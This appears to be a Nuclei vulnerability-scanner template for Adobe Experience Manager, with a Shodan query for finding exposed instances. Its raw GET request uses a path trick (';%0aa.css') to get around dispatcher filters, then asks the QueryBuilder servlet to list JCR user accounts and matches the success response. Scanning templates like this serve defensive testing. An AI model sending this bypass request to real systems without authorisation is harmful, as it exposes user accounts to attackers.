id: aem-jcr-querybuilder

info:
  name: Query JCR role via QueryBuilder Servlet
  author: DhiyaneshDk
  severity: info
  metadata:
    max-request: 1
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,misconfig

http:
  - raw:
      - |
        GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"success":true'
          - 'jcr:uuid'
        condition: and

# digest: 4a0a004730450221008365eca02e6217a90a81158a8c3d0fe5bee5715380b46a141b9a50a21c5776fa02207553b8de50c5bdea729d644da1ca6ea5b01c6368aaed4399fe8b947d908ddcbd:922c64590222798bb761d5b6d8e72950
